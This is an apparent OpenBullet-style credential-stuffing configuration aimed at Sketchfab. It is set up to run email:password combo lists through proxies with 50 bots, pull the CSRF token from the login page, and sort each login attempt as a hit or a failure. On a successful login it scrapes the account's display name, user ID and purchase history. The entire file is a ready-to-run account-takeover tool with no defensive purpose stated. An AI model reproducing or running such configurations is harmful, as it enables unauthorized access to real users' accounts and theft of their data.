[SETTINGS]
{
  "Name": "Sketchfab",
  "SuggestedBots": 50,
  "LastModified": "2018-05-14T23:35:55.9523773+00:00",
  "AdditionalInfo": "Awesome 3DCG stuff",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST GET "https://sketchfab.com/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_CSRF PARSE "<SOURCE>" CSS "[name=csrfmiddlewaretoken]" "value" 0 -> VAR "CSRF" "" "" 
#LOGIN REQUEST POST "https://sketchfab.com/login" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "x-csrftoken: <CSRF>" 
  HEADER "referer: https://sketchfab.com/login" 
  HEADER "origin: https://sketchfab.com" 
  HEADER "x-requested-with: XMLHttpRequest" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "\"/accounts/profile/\", " 
  KEYCHAIN Failure OR 
    KEY "{}" 
#GET_MAIN_PAGE REQUEST GET "https://sketchfab.com" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_NAME PARSE "<SOURCE>" LR "displayName\": \"" "\"" Recursive=FALSE -> VAR "NAME" "" "" 
#PARSE_USER_ID PARSE "<SOURCE>" LR "'userId' : '" "'" Recursive=FALSE -> VAR "USERID" "" "" 
#GET_PURCHASES_PAGE REQUEST GET "https://sketchfab.com/<NAME>/purchases" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#GET_PURCHASES REQUEST GET "https://sketchfab.com/i/store/orders?buyer=<USERID>&count=24&sort_by=-createdAt&status=succeeded&status=returned" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "x-csrftoken: <CSRF>" 
  HEADER "x-requested-with: XMLHttpRequest" 
#CHECK_IF_FREE KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "results\":[],\"" 
#CAPTURE_PURCHASES PARSE "<SOURCE>" LR "results\":[" "]" Recursive=FALSE -> CAP "Purchases" "" "" 
